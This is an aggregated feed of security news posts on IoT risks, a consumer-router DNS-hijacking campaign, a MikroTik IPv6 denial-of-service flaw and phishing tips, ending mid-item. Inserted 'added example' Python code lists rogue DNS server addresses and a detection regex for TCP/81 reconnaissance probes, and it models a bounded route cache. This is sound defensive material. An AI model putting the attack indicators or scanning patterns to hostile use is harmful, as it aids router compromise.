A smart home in today’s world is no longer a wave of the future, but rather just a sign of the times we live in. You would be hard pressed to find a home that didn’t contain some form of smart device. From digital assistants to smart plugs, with more endpoints come more avenues bad actors can use to access home networks. As recently as 2018, users saw virtual assistants, smart TVs, and even smart plugs that appeared secure on the surface but had underlying security flaws that could facilitate home network exposures by bad actors in the future, while some IoT devices, such as an IoT thermometer and home Wi-Fi routers, were actually used to conduct botnet attacks.

While federal agencies, like the FBI, and IoT device manufacturers are stepping up to do their part to combat IoT-based cyberattacks, there are still precautions users should take to ensure their smart home and family remain secure. Consider this your IoT cybersecurity kit to keep unwelcome visitors out of your home network.

  • When purchasing an IoT device, make security priority #1. Before your next purchase, conduct due diligence. Prioritize devices that have been on the market for an extended period of time, have a trusted name brand, and/or have a lot of online reviews. By following this vetting protocol, the chances are that the device’s security standards will be higher.
  • Keep your software up-to-date on all devices. To protect against potential vulnerabilities, manufacturers release software updates often. Set your device to auto-update, if possible, so you always have the latest software. This includes the apps you use to control the device.
  • Change factory settings immediately. Once you bring a new device into your home, change the default password to something difficult to guess. Cybercriminals often can find the default settings online and can use them to access your devices. If the device has advanced capabilities, use them.
  • Secure your home network. It’s important to think about security as integrated, not disconnected. Not all IoT devices stay in the home. Many are mobile but reconnect to home networks once they are back in the vicinity of the router. Protect your network of connected devices no matter where they go. Consider investing in an advanced internet router with built-in protection that can secure and monitor any device that connects to your home network.
  • Use comprehensive security software. Vulnerabilities and threats emerge and evolve every day. Protect your network of connected devices no matter where you are with a tool like McAfee Total Protection.

Interested in learning more about IoT and mobile security trends and information? Follow @McAfee_Home on Twitter, and “Like” us on Facebook.

The post What’s in Your IoT Cybersecurity Kit? appeared first on McAfee Blogs.

DNS hijacking campaigns target Gmail, Netflix, and PayPal users

Security experts at Bad Packets uncovered a DNS hijacking campaign that is targeting the users of popular online services, including Gmail, Netflix, and PayPal.

Experts at Bad Packets uncovered a DNS hijacking campaign that has been ongoing for the past three months; the attackers are targeting the users of popular online services, including Gmail, Netflix, and PayPal.

Hackers compromised consumer routers and modified the DNS settings to redirect users to fake websites designed to trick victims into providing their login credentials.

Bad Packets experts have identified four rogue DNS servers being used by attackers to hijack user traffic.

“Over the last three months, our honeypots have detected DNS hijacking attacks targeting various types of consumer routers.” reads the report published by Bad Packets. “All exploit attempts have originated from hosts on the network of Google Cloud Platform (AS15169). In this campaign, we’ve identified four distinct rogue DNS servers being used to redirect web traffic for malicious purposes.”

Experts pointed out that all exploit attempts have originated from hosts on the network of Google Cloud Platform (AS15169).

The first wave of DNS hijacking attacks targeted D-Link DSL modems, including D-Link DSL-2640B, DSL-2740R, DSL-2780B, and DSL-526B. The DNS server used in this attack was hosted by OVH Canada (66[.]70.173.48).

The second wave of attacks targeted the same D-Link modems, but attackers used a different rogue DNS server (144[.]217.191.145) hosted by OVH Canada.


“As Twitter user “parseword” noted, the majority of the DNS requests were being redirected to two IPs allocated to a crime-friendly hosting provider (AS206349) and another pointing to a service that monetizes parked domain names (AS395082),” the experts continue.

The third wave of attacks observed in March hit a larger number of router models, including ARG-W4 ADSL routers, DSLink 260E routers, Secutech routers, and TOTOLINK routers.

The fourth wave of DNS hijacking attacks originated from three distinct Google Cloud Platform hosts and involved two rogue DNS servers hosted in Russia by Inoventica Services (195[.]128.126.165 and 195[.]128.124.131).

In all the DNS hijacking attacks the operators performed an initial recon scan using Masscan. Attackers check for active hosts on port 81/TCP before launching the DNS hijacking exploits.

The campaigns target users of Gmail, PayPal, Netflix and Uber; the attackers also hit several Brazilian banks.

Experts found over 16,500 vulnerable routers potentially exposed to this DNS hijacking campaign.

“Establishing a definitive total of vulnerable devices would require us to employ the same tactics used by the threat actors in this campaign. Obviously this won’t be done, however we can catalog how many are exposing at least one service to the public internet via data provided by BinaryEdge” continues Bad Packets.

Experts explained that attackers abused Google’s Cloud platform for these attacks because it is easy for everyone with a Google account to access a “Google Cloud Shell.” This service offers users the equivalent of a Linux VPS with root privileges directly in a web browser.
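For a router owner or network defender, the practical question raised by this report is whether a device's DNS settings now point at one of the rogue resolvers, and whether the TCP/81 reconnaissance described above has been hitting the WAN interface. The following is an added example, not Bad Packets' tooling: it refangs the four resolver addresses quoted in the article, classifies a list of configured resolvers against them and against an operator allowlist, and separately pulls inbound TCP/81 SYNs out of netfilter-style firewall log lines. The resolver lists and log lines are constructed samples using documentation address ranges, and the regex assumes the `SRC=... PROTO=TCP ... DPT=81 ... SYN` field layout of the Linux iptables LOG target.

```python
# Added example (not Bad Packets' tooling): check a router's configured DNS
# resolvers against the rogue servers named in the report, and flag the
# TCP/81 reconnaissance probes in netfilter-style firewall logs.
import ipaddress
import re
from typing import Iterable, List, Tuple


def refang(defanged: str) -> str:
    """Turn the '66[.]70.173.48' notation used in reports back into a parseable address."""
    return defanged.replace("[.]", ".")


# The four rogue resolvers quoted in the article (OVH Canada and Inoventica hosts).
KNOWN_ROGUE_DNS = {
    ipaddress.ip_address(refang(s))
    for s in ("66[.]70.173.48", "144[.]217.191.145",
              "195[.]128.126.165", "195[.]128.124.131")
}


def check_resolvers(configured: Iterable[str], expected: Iterable[str]) -> List[Tuple[str, str]]:
    """Classify each resolver found in the router's DNS settings.

    configured: addresses as read from the router (defanged or not).
    expected:   the resolvers the operator actually configured (ISP or public).
    Anything off that allowlist is worth a look even if it is not a known IoC,
    because a hijack campaign changes servers between waves."""
    allow = {ipaddress.ip_address(refang(s)) for s in expected}
    findings = []
    for raw in configured:
        try:
            ip = ipaddress.ip_address(refang(raw))
        except ValueError:
            findings.append((raw, "invalid"))
            continue
        if ip in KNOWN_ROGUE_DNS:
            findings.append((str(ip), "known-rogue"))
        elif ip not in allow:
            findings.append((str(ip), "unexpected"))
        else:
            findings.append((str(ip), "ok"))
    return findings


# Inbound SYN to TCP/81: the Masscan pre-check the article describes. Field
# layout assumed to be Linux netfilter (iptables LOG target) style.
PORT81_PROBE = re.compile(r"SRC=(?P<src>[0-9a-fA-F.:]+)\b.*\bPROTO=TCP\b.*\bDPT=81\b.*\bSYN\b")


def find_port81_probes(log_lines: Iterable[str]) -> List[str]:
    """Return source addresses of inbound TCP/81 SYNs, duplicates kept so the
    caller can count per-source volume."""
    hits = []
    for line in log_lines:
        m = PORT81_PROBE.search(line)
        if m:
            hits.append(m.group("src"))
    return hits


# Constructed samples (documentation address ranges, not real traffic).
SAMPLE_RESOLVERS = ["66[.]70.173.48", "1.1.1.1", "8.8.8.8"]
SAMPLE_ALLOWLIST = ["1.1.1.1", "1.0.0.1"]
SAMPLE_FW_LOG = [
    "kernel: IN=eth0 OUT= SRC=203.0.113.10 DST=198.51.100.7 PROTO=TCP SPT=40000 DPT=81 WINDOW=1024 SYN URGP=0",
    "kernel: IN=eth0 OUT= SRC=203.0.113.11 DST=198.51.100.7 PROTO=TCP SPT=40001 DPT=443 WINDOW=1024 SYN URGP=0",
    "kernel: IN=eth0 OUT= SRC=203.0.113.12 DST=198.51.100.7 PROTO=UDP SPT=5353 DPT=53 LEN=40",
    "kernel: IN=eth0 OUT= SRC=203.0.113.10 DST=198.51.100.7 PROTO=TCP SPT=40002 DPT=81 WINDOW=1024 SYN URGP=0",
]

if __name__ == "__main__":
    for ip, verdict in check_resolvers(SAMPLE_RESOLVERS, SAMPLE_ALLOWLIST):
        print(f"{ip:18} {verdict}")
    print("TCP/81 probes from:", find_port81_probes(SAMPLE_FW_LOG))
```

The allowlist is the part that keeps working after the IoC list goes stale: a resolver you did not configure is the symptom of the hijack regardless of which server the current wave uses. Feed `check_resolvers` the addresses from the router's WAN/DHCP settings and the `resolv.conf` of a client behind it, since the report notes the attackers change the router's DNS rather than the client's.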

Further technical details, including IoCs, are reported in the analysis published by Bad Packets:

https://badpackets.net/ongoing-dns-hijacking-campaign-targeting-consumer-routers/

Pierluigi Paganini

(SecurityAffairs – DNS hijacking, hacking)

The post DNS hijacking campaigns target Gmail, Netflix, and PayPal users appeared first on Security Affairs.

DoS flaw in several MikroTik Routers exploited in attacks

A vulnerability could be exploited by attackers to trigger a denial-of-service (DoS) condition on devices running RouterOS.

MikroTik routers made the headlines again: the company disclosed this week technical details about a year-old vulnerability that exposes its devices to remote attacks.

Attackers could exploit the vulnerability to trigger a denial-of-service (DoS) condition on devices running RouterOS.

“RouterOS contained several IPv6 related resource exhaustion issues, that have now been fixed, taking care of the above-mentioned CVE entries.” reads a blog post published by MikroTik.

“The first issue caused the device to reboot if traffic to a lot of different destination addresses was routed. The reboot was caused by watchdog timer since the device was overloaded and stopped responding”

The Latvian vendor already released security updates for the RouterOS that addressed the flaw (CVE-2018-19299), but according to the experts, some of the affected devices continue to be vulnerable.

The CVE-2018-19299 vulnerability affects unpatched MikroTik devices that route IPv6 packets. An attacker could exploit the issue by sending a specific sequence of IPv6 packets that saturates the device's RAM.

“After that reboot was fixed, another issue caused the memory to be filled, because IPv6 route cache size could be bigger than the available RAM. This also was fixed, by introducing automatic cache size calculation based on available memory.” continues the post.

MikroTik addressed the issues in RouterOS versions published in April 2019 (all release chains: RouterOS v6.44.2, RouterOS v6.45beta23 and RouterOS v6.43.14).

Experts discovered that the fix for the DoS flaw only works on devices with more than 64MB of RAM.
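The post describes the second MikroTik issue as a route cache that could outgrow physical RAM, and the fix as sizing the cache from available memory. The following is an added illustration of that mitigation pattern in Python, not RouterOS code and not MikroTik's actual algorithm: `cache_capacity` derives an entry limit from a memory budget (the 25 percent fraction, the 256-byte per-entry cost and the floor are assumptions), and `BoundedRouteCache` evicts the least recently used destinations once the limit is hit, so a flood of distinct destinations raises the eviction counter instead of the memory footprint. `simulate_flood` drives it with constructed IPv6 destinations in the 2001:db8::/32 documentation prefix.

```python
# Added example (illustrative, not RouterOS code): a route cache whose size is
# derived from available memory, so attacker-chosen destinations cause eviction
# rather than unbounded growth.
from collections import OrderedDict
from typing import Optional, Tuple

MIB = 1024 * 1024


def cache_capacity(available_bytes: int, entry_bytes: int = 256,
                   budget_fraction: float = 0.25, floor: int = 256) -> int:
    """Entry limit for the cache: a fixed fraction of available RAM divided by
    the per-entry cost, never below a small floor. All constants are assumed."""
    return max(floor, int(available_bytes * budget_fraction) // entry_bytes)


class BoundedRouteCache:
    """LRU cache of destination -> next hop. A cache keyed by destination
    address with no cap is the resource-exhaustion shape the MikroTik post
    describes; the cap turns that into eviction of cold entries."""

    def __init__(self, capacity: int) -> None:
        if capacity < 1:
            raise ValueError("capacity must be positive")
        self.capacity = capacity
        self._entries: "OrderedDict[str, str]" = OrderedDict()
        self.evictions = 0

    def lookup(self, dst: str) -> Optional[str]:
        next_hop = self._entries.get(dst)
        if next_hop is not None:
            self._entries.move_to_end(dst)  # mark as recently used
        return next_hop

    def insert(self, dst: str, next_hop: str) -> None:
        if dst in self._entries:
            self._entries.move_to_end(dst)
        elif len(self._entries) >= self.capacity:
            self._entries.popitem(last=False)  # drop least recently used
            self.evictions += 1
        self._entries[dst] = next_hop

    def __len__(self) -> int:
        return len(self._entries)


def simulate_flood(cache: BoundedRouteCache, n_destinations: int) -> Tuple[int, int]:
    """Constructed traffic: route packets to n distinct IPv6 destinations, the
    pattern that filled the unbounded cache. Returns (entries held, evictions)."""
    for i in range(n_destinations):
        cache.insert(f"2001:db8::{i:x}", "fe80::1")
    return len(cache), cache.evictions


if __name__ == "__main__":
    for ram in (64 * MIB, 256 * MIB):
        print(f"{ram // MIB:4d} MiB RAM -> capacity {cache_capacity(ram)} entries")
    cache = BoundedRouteCache(cache_capacity(64 * MIB))
    print("after flood (entries, evictions):", simulate_flood(cache, 200_000))
```

The point of deriving the limit from memory rather than hard-coding it is the one the article makes about the 64MB boards: a budget that is comfortable on a 256MB router leaves a small device with almost nothing, so the floor and the fraction have to be chosen per hardware class, and a device whose floor already exceeds what it can spare has not been fixed by the calculation.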


MikroTik trainer Javier Prieto tested the issue on a Cloud Hosted Router (CHR) with 256MB of RAM; he observed that the attack caused additional usage of 20 MiB.

“I have done several tests with GNS3 using CHR 6.44.2 (stable) and as long as the router has enough memory, it doesn’t crash. In my tests, the attack ‘steals’ around 180 MiB.” explained Prieto.

“Using a CHR with 256 MB, system resources shows a total memory of 224 MiB and free-memory of 197 MiB before attack. During the attack, only from one computer, the free memory decreases to around 20 MiB and sometimes to 13 MiB. Using two attackers, it seems the results are the same and not worse. With 200 MB the router reboots because OOM.”

The flaw was reported by several experts, including Isalski, back on April 16, 2018. The expert explained that the vendor acknowledged the flaw, but that it did not classify it as a security vulnerability.

In March Isalski reported the flaw to several emergency response teams and disclosed evidence of the exploitation of the vulnerability in attacks in the wild.

Isalski confirmed that the CVE-2018-19299 flaw “affects almost any of MikroTik’s devices, even those used as ‘core’ or ‘backhaul’ routers.”

“More than 20 RouterOS versions have been released since MikroTik learned about the vulnerability.” reported Bleeping Computer. “One reason for this, besides dismissing its security risk, is that the flaw is at kernel level and it is very difficult to fix. A member of the company’s support team said that RouterOS v6 has an older kernel version and it cannot be changed.”

Experts believe that the vendor will introduce some optimizations in the next beta version of RouterOS for hardware with low RAM resources.

Pierluigi Paganini

(SecurityAffairs – CVE-2018-19299, MikroTik)

The post DoS flaw in several MikroTik Routers exploited in attacks appeared first on Security Affairs.

New malware can modify CT and MRI scan results

By Waqas

Call it killer malware? Israeli researchers have developed a new malware that highlights some very critical and dangerous security vulnerabilities in medical imaging equipment, which is commonly used to diagnose serious health conditions like cancer and hypertrophic cardiomyopathy (HCM). Not only can the malware impact the diagnosis of the imaging equipment but can also compromise […]

This is a post from HackRead.com. Read the original post: New malware can modify CT and MRI scan results

One Year In: How our $5B investment in IoT and intelligent edge is accelerating customer, partner and solution innovation

One year ago, we announced our commitment to invest $5B in IoT (Internet of Things) and intelligent edge – technology that is accelerating ubiquitous computing and bringing unparalleled opportunity for transformation across industries. Our commitment is to build a trusted, easy-to-use platform on which our customers and partners can build solutions – no matter where they are starting in their IoT journey.

Our customers are embracing IoT as a core strategy to drive better business outcomes, improve safety and address social issues – from predicting and preventing equipment failures, optimizing smart buildings for space utilization and energy management and improving patient outcomes and worker safety. From the intelligent cloud to the intelligent edge, this year has been one of tremendous growth – in IoT technology portfolio, partner ecosystem and customer momentum – and we are only just beginning.

Accelerating customer innovation in IoT from cloud to edge across industries

What’s truly exciting is seeing our customers achieve real business outcomes with Azure IoT and intelligent edge-based solutions. Our IoT platform is powering customer solutions with thousands of devices, at scale, and the number of devices supported has grown nearly 150 percent year-over-year. This year, many customers such as Starbucks, Chevron, Walmart, Walgreens, BMW, Volkswagen, Toyota Material Handling Group and more are leveraging Azure as their cloud platform with IoT and AI services to accelerate their digital transformation.

Starbucks is using Azure Sphere to connect select equipment, enabling its partners (employees) more opportunity to engage with customers. This includes everything from beverage consistency, waste reduction, the management of energy consumption and predictive maintenance.

With Azure and our IoT services, Chevron is connecting a critical piece of equipment – heat exchangers, which manage the heat from fluids flowing through it as part of the plant’s fuel processing – to do predictive maintenance and ultimately prevent unscheduled outages.

In Walmart’s technology center in Austin, Texas, which is designed to accelerate digital innovation, the retail leader is embracing IoT as a way to save energy and prevent product loss. Walmart is using thousands of IoT sensors on HVAC and refrigeration systems that process a billion daily data messages from stores worldwide.

As part of Microsoft’s partnership with Walgreens Boots Alliance (WBA) to make health care delivery more personal, affordable and accessible for people around the world, WBA will use a portfolio of connected IoT devices for nonacute chronic care management, delivered by Microsoft’s cloud, AI and IoT technologies.

This week with BMW Group, we announced the Open Manufacturing Platform (OMP), a new technology framework and open community to share smart factory solutions across the automotive and manufacturing sectors to significantly accelerate future industrial IoT developments.

This year Volkswagen announced a partnership with Microsoft to create the Volkswagen Automotive Cloud with Azure and Azure IoT Edge to create a seamless experience for drivers from the moment they enter, use and leave their vehicles. From 2020 onwards, more than 5 million new Volkswagen brand vehicles per year will be fully connected and will be part of the IoT cloud.

By infusing solutions with artificial intelligence, mixed reality and the IoT, Toyota Material Handling Group is providing solutions that help customers meet the global rise in ecommerce and move goods quickly, frequently, accurately and safely. With Microsoft technologies, the solutions range from connected forklift and field service systems available today to AI-powered concepts that pave the way for intelligent automation and logistics simulations – all designed with Toyota’s standards for optimizing efficiency, operation assisting and continuous improvement.

The stories continue to roll in.

New innovations in our IoT platform

In the last year, we launched more than 100 new services and features in our IoT platform, designed to make IoT solutions more secure and scalable, reduce complexity, make our platform more open and create opportunities in new market areas. Our core focus has been to address the industry challenge of securing connected devices at every layer, as well as advancing IoT to create a more seamless experience between the physical and digital worlds.

Simplifying IoT and securing IoT endpoints at scale

IoT is complex, requiring deep knowledge of cloud, security and devices, but the business benefits are significant. With Azure IoT Central, which became generally available this year, we have created a way for businesses to get started in IoT by quickly provisioning a solution in just a matter of hours and with built-in security features. With valuable data moving closer to the edge, IoT security demands a holistic approach. This year we introduced Azure Sphere, a world-class security solution for connected microcontroller devices (MCUs), which go in everything from smart-home and medical devices to equipment on the factory floor. Windows 10 IoT Core Services includes security and reliability updates for the operating system to keep device security up to date. Azure Security Center for IoT now includes support for Azure IoT services to proactively monitor IoT devices, enabling businesses to implement security best practices for detecting and mitigating threats.

Delivering spatial intelligence at scale

IoT is no longer just about connected endpoints. It’s the sum of the endpoints – the digital objects – that create a holistic solution. We see significant opportunity for our customers to use spatial intelligence to manage physical assets and spaces with digital models and mapping across smart spaces, cities and buildings. This fall, we introduced Azure Digital Twins to enable customers and partners to query data in the context of a space – rather than from disparate sensors – empowering them to build repeatable, scalable experiences that correlate data from digital sources and the physical world. Azure Maps provides developers from all industries with powerful geospatial capabilities, and new MR services including Azure Spatial Anchors and Azure Remote Rendering enable customers to create precise points of interest with mixed reality in physical space as well as interactive, high-quality 3D models.

Bringing AI to the edge

The proliferation of IoT devices and the resulting massive amount of data requiring real-time intelligence are fueling the need to move compute and analytics closer to where the data resides. This year, we open sourced the Azure IoT Edge runtime, giving developers even greater flexibility and control over their edge solutions and enabling them to modify the runtime and debug issues for applications at the edge. Over the past year, we added five new Azure Cognitive Services that can run locally on an edge device, and we’ve made it easier to deploy your own Azure Machine Learning models on Azure IoT Edge. We’ve also enabled high-speed inferencing at the edge with Azure Data Box Edge.

Growing the Microsoft IoT partner ecosystem

We’re proud to have one of the largest and fastest-growing partner ecosystems with more than ten thousand IoT partners from intelligent edge to intelligent cloud. Partners are critical to our customers’ success in IoT, bringing rich domain expertise across industries so customers can see clear value to their business, as well as integration for critical apps and infrastructure to increase time to value.

This year, we announced more than 70 new partnerships in IoT, which help our customers build IoT solutions faster. At CES we announced our collaboration with Universal Electronics to launch a new digital assistant platform for the home built on Microsoft Azure using AI and IoT services. PTC announced ThingWorx Industrial Innovation Platform on Microsoft Azure to deliver a robust solution for Industrial IoT and digital product lifecycle management. At MWC, we announced new partnerships with SAP and Cradlepoint. SAP Leonardo IoT will integrate with Azure IoT services, providing our customers with the ability to contextualize and enrich their IoT data with SAP business data within SAP Leonardo IoT to drive new business outcomes. With Cradlepoint, we’re enabling customers to connect their IoT infrastructure to cloud-based applications and to a global satellite communications network, helping to bridge the OT and IT collaboration gap.

We’re also working with several device partners to accelerate development at the intelligent edge. With Qualcomm, we created an Azure IoT Starter Kit to enable developers to build vision AI solutions and run their AI models on the device. With NXP, we announced the public preview of Windows 10 IoT Core with built-in Azure connectivity, to enable secure, power-optimized devices for the intelligent edge. We’re also partnering with NVIDIA and DJI to integrate third-party SDKs to simplify development and increase time to value of AI applications at the edge.

Looking ahead: Industry opportunity in IoT

We are one year into our four-year investment. Our priority over the next three years is clear: make it easy for any company to create scalable, secured IoT solutions. We partnered with Boston Consulting Group (BCG) to better understand the trends and opportunity for the industry at large. Our findings, captured in the whitepaper here, indicate IoT is moving into broad adoption and yet, some of the greatest barriers to success are not just about technology; they are also about business strategy and executive leadership. More than 60 percent of executives we surveyed indicated these to be bigger elements of success than technology. One in four executives we surveyed indicated that their companies’ IoT initiatives underperformed expectations. The findings highlight key ingredients for a successful IoT innovation project. You’ll continue to see more announcements from us and our partners and customers to help our customers and partners in their IoT journeys. You can read more about adoption of IoT across industries in the BCG whitepaper.

The post One Year In: How our $5B investment in IoT and intelligent edge is accelerating customer, partner and solution innovation appeared first on The Official Microsoft Blog.

Radware Blog: Application SLA: Knowing Is Half the Battle

Applications have come to define the digital experience. They empower organizations to create new customer-friendly services, unlock data and content and deliver it to users at the time and device they desire, and provide a competitive differentiator over the competition. Fueling these applications is the “digital core,” a vast plumbing infrastructure that includes networks, data […]

The post Application SLA: Knowing Is Half the Battle appeared first on Radware Blog.

Tesla autopilot feature hacked to risk oncoming traffic

By Waqas

Tesla’s High-End Vehicle’s Lane Recognition System Not Free from Technical Glitches, Keen Labs Claims in New Research. Cybersecurity firm Keen Labs published a research paper [PDF] on Saturday in which it described the three hacks that the company detected that can be used to manipulate the Tesla Model S. The first two hacks were directed towards the […]

This is a post from HackRead.com Read the original post: Tesla autopilot feature hacked to risk oncoming traffic

Encryption deployment increases as organizations struggle to address compliance requirements

As organizations embrace the cloud and new digital initiatives such as the IoT, blockchain and digital payments the use of trusted cryptography to protect their applications and sensitive information is

The post Encryption deployment increases as organizations struggle to address compliance requirements appeared first on The Cyber Security Place.

McAfee Blogs: The GPS Rollover Bug: 3 Tips to Help You Avoid Phishing Scams

Today, users are extremely reliant on our GPS devices. In fact, we’re so reliant on these devices that map features are programmed into almost every IoT device we use as well as inside of our vehicles. However, the Department of Homeland Security has issued an alert to make users aware of a GPS receiver issue called the GPS Week Number Rollover that is expected to occur on or around April 6, 2019. While this bug is only expected to affect a small number of older GPS devices, users who are impacted could face troubling results.

You may be wondering, what will cause this rollover issue? GPS systems count weeks using a ten-bit parameter, meaning that they start counting at week zero and then reset when they hit week 1,024, or 19.5 years. Because the last reset took place on August 21, 1999, it appears that the next reset will occur on April 6, 2019. This could result in devices resetting their dates and potentially corrupting navigation data, which would throw off location estimates. That means your GPS device could misrepresent your location drastically, as each nanosecond the clock is out translates into a foot of location error.

So, how does this rollover issue translate into a potential cyberthreat? It turns out that the main fix for this problem is to ensure that your GPS device’s software is up-to-date. However, due to the media attention that this bug is receiving, it’s not far-fetched to speculate that cybercriminals will leverage the issue to target users with phishing attacks. These attacks could come in the form of email notifications referencing the rollover notice and suggesting that users install a fraudulent software patch to fix the issue. The emails could contain a malicious payload that leaves the victim with a nasty malware on their device.

While it’s difficult to speculate how exactly cybercriminals will use various events to prey on innocent users, it’s important to be aware of potential threats to help protect your data and safeguard your devices. Check out the following tips to help you spot potential phishing attacks:

  • Validate the email address is from a recognized sender. Always check the validity of signature lines, including the information on the sender’s name, address, and telephone number. If you receive an email from an address that you don’t recognize, it’s best to just delete the email entirely.
  • Hover over links to see and verify the URL. If someone sends you a link to “update your software,” hover over the link without actually clicking on it. This will allow you to see a link preview. If the URL looks suspicious, don’t interact with it and delete the email altogether.
  • Be cautious of emails asking you to take action. If you receive a message asking you to update your software, don’t click on anything within the message. Instead, go straight to your software provider’s website. This will prevent you from downloading malicious content from phishing links.

And, as always, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post The GPS Rollover Bug: 3 Tips to Help You Avoid Phishing Scams appeared first on McAfee Blogs.

This Week in Security News: Cybersecurity Skills Gap and Legislature

Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, learn how the cybersecurity skills gap is affecting organizations. Also, learn how a bipartisan bill is working to close the gap.

Read on:

What Hacker History Can Tell Enterprises About Future Attack Strategy

This report delves into nearly two decades of hacking and malicious activity, which can also help point IT admins and decision-makers in the right direction with their security strategies.

Bipartisan Bill Aims to Close Gap in Congressional Cybersecurity

A bipartisan bill aims to close what is regarded as a major gap in congressional cybersecurity and extend the government’s protections to senators and their staffers’ personal phones and computers.

Global Telecom Crime Undermining Internet Security: Cyber-Telecom Crime Report

Understanding the current threat landscape can help reduce the impact of crimes like telecom fraud and prepare us for future threats in the age of the IoT.

These 20-Something Hackers Won $375,000 and a Model 3 for Finding a Tesla Bug

Two hackers exposed a security bug in the Tesla Model 3 that allowed them to hack into the electric car’s internal web browser during hacking competition Pwn2Own, hosted by Trend Micro’s Zero Day Initiative.

Cybersecurity Skills Shortage a Problem for Nearly 50 Percent of Organizations

The skills shortage problem showcased in an Opinium survey showed nearly 50 percent of 1,125 CISO respondents shared that it is a cause for concern for their organizations.

New Research Reveals How Adversarial Attacks Can Subvert Machine Learning Systems

A research paper published in the journal Science warns of the prospect of advanced techniques being used to throw machine learning (ML) systems off.

Norsk Hydro Ransomware Incident Losses Reach $40 Million After One Week

A week after suffering a crippling ‘LockerGoga’ ransomware infection, Norwegian aluminum producer Norsk Hydro estimates that total losses from the incident have already reached $40 million.

‘Long-Term Security Risks’ From Huawei

The Chinese company Huawei has been strongly criticized in a report issued by the National Cyber Security Centre, the body overseeing the security of its products in UK telecoms.

Astronomical Costs, Geopolitical Headaches: Telecom Fraud is Too Big to Ignore, Report Says

International telecommunications fraud — including activities like consumer scams and corporate ripoffs — costs around $33 billion per year, according to a report published by Trend Micro and Europol.

Do you think the new bipartisan bill will close the cybersecurity gap? Why or why not? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: @JonLClay.

The post This Week in Security News: Cybersecurity Skills Gap and Legislature appeared first on .

The 7 Biggest Cybersecurity Threats In An IoT World

Everything’s bigger in the Internet of Things. Well, not the devices themselves — those are commonly small enough to hold just a couple of chips and are frequently hidden out

The post The 7 Biggest Cybersecurity Threats In An IoT World appeared first on The Cyber Security Place.

TrendLabs Security Intelligence Blog: Telecom Crimes Against the IoT and 5G

by: Trend Micro Research and Europol’s European Cybercrime Centre (EC3)

Telecommunications or telecom technology is the underpinning of the modern internet, and consequently of the internet’s growing segment, the internet of things (IoT). Likewise, the global telecommunications network we enjoy today has been greatly influenced by the existence and growth of the internet. The relationship between telecom and the internet runs both ways, to the point that the divide is indistinguishable for users: the very same telecom carriers we subscribe to are what connect us to the internet. At its best, this relationship is exemplified by advances in network connectivity as we move to 5G. In our paper with Europol’s European Cybercrime Centre (EC3), “Cyber-Telecom Crime Report 2019,” we explore how this relationship can also be used to threaten and defraud the IoT.

The SIM Connection

A common and well-known link between communication devices and internet devices is the use of a SIM card. For IoT devices to have a unique presence and connection to the internet, they need a SIM in the same way a phone does. This could be a familiar white SIM card, or something smaller attached to the circuitry of the device. A phone makes or receives calls, SMS, or data; in the same way, an IoT device has a SIM to allow it to receive and make calls, SMS, or data.

SIM cards can serve like credit or debit cards in that they are used to initiate billing or connections that have corresponding fees. That’s why SIM cards, unfortunately, can be subject to many of the same frauds and risks credit cards are. In addition, the use of SIM cards — and telecom in general — in fraud appeals to criminals, perhaps because the telecom sector is not under regulation for money laundering controls.

In the case of smart city devices like traffic lights and smart garbage bins, cybercriminals have various ways to abuse SIM cards. They could choose to extract the SIM cards embedded in the IoT devices and use the SIMs to launder money or conduct other illicit activities. In some cases, even when the SIM cards might be difficult to extract, vulnerabilities still lie in how the devices have the capability to change carriers remotely. Moving from one carrier to another creates risks as some carriers could be cooperating with or created by criminals.

Bucketed subscription aggregation is also a problem with the IoT, especially in the development of more complex and large-scale IoT environments like smart cities. Such scale could be met with inadequate security measures, wherein many IoT devices (as many as millions) are aggregated to a single accounting line. When even just a single SIM of these IoT devices is compromised, the fraud it facilitates will be left undetected due to the inadequate accounting oversight.

It is also important to note that even if an IoT device is “dumb” or doesn’t have the ability to call or send messages, it doesn’t mean that its SIM is also limited — a fact that many procurement departments of large-scale IoT implementations might forget. These dumb devices could hold unknown telecom capabilities, ones that could be exploited by cybercriminals for data-borne malware infection or very costly long-distance fraud.

Figure 1. IoT SIM supply chain compromise threat model

Large IoT Infrastructures

The scalability of IoT is one of its greatest assets, which, in the case of telecom fraudsters, is something of an opportunity as well. Depending on the number of deployed IoT devices and supporting technologies like dedicated servers, its environment can scale from one entire home to an entire city. The larger the scale, the more challenging it would be to monitor each connected device.

Even smaller-scale environments like smart homes, buildings, and factories do not escape the risk of being used for telecom fraud. Although smart factories are typically isolated from the internet, they do still require some form of cellular data connection to perform backups to an offsite location or undergo remote maintenance. Through this connection, cybercriminals can use cyber-telecom vulnerabilities against them and use them for outbound fraud.

Even smart and autonomous vehicles can be subject to the same attacks as mobile phones. Telephony denial of service (TDoS), for example, could cause a smart car to become lost due to a broken internet connection.

Securing Telecom and the IoT

Keeping in mind the connection between IoT and telecom should help in creating defenses against threats that shift from one to the other. Getting a grasp on common channels used by IoT devices can uncover hidden telecom capabilities in them. For IoT devices, simple measures like changing the default settings and credentials of the device can already prevent some of the mentioned telecom attacks.

Telecom technology and the IoT have proven that connectivity can be a powerful tool that helps us save time, improve efficiency, and bridge borders, among others. However, connections that run beyond our awareness can be abused to the detriment of others, through crimes like fraud and money laundering. It is important to acknowledge that there is only so much a single organization or industry can do against an interconnected web of threats. Collaboration and cooperation between all stakeholders, from telecom carriers to security experts and law enforcement, are necessary in keeping our connections safe.

For the complete discussion on telecom threats, read our paper “Cyber-Telecom Crime Report 2019.”

The post Telecom Crimes Against the IoT and 5G appeared first on .

Post-Perimeter Security: Addressing Evolving Mobile Enterprise Threats

Experts from Gartner, Lookout and Google talk enterprise mobile security in this webinar replay.

How to Secure Your Home DNS for Under $100

Like many technologists who are also parents, I think a great deal about how best to protect my family online. Working for a security company, I have access to more tools than the average person, so recently I’ve implemented DNS security at home. I focused on DNS because there are no “services” offered on my home network, and I’m mostly concerned about my kids or wife clicking on a phishing link or similar outbound malicious traffic.

Vulnerability Spotlight: Multiple Vulnerabilities in CUJO Smart Firewall, Das U-Boot, OCTEON SDK, Webroot BrightCloud


Claudio Bozzato of Cisco Talos discovered these vulnerabilities.

Executive summary


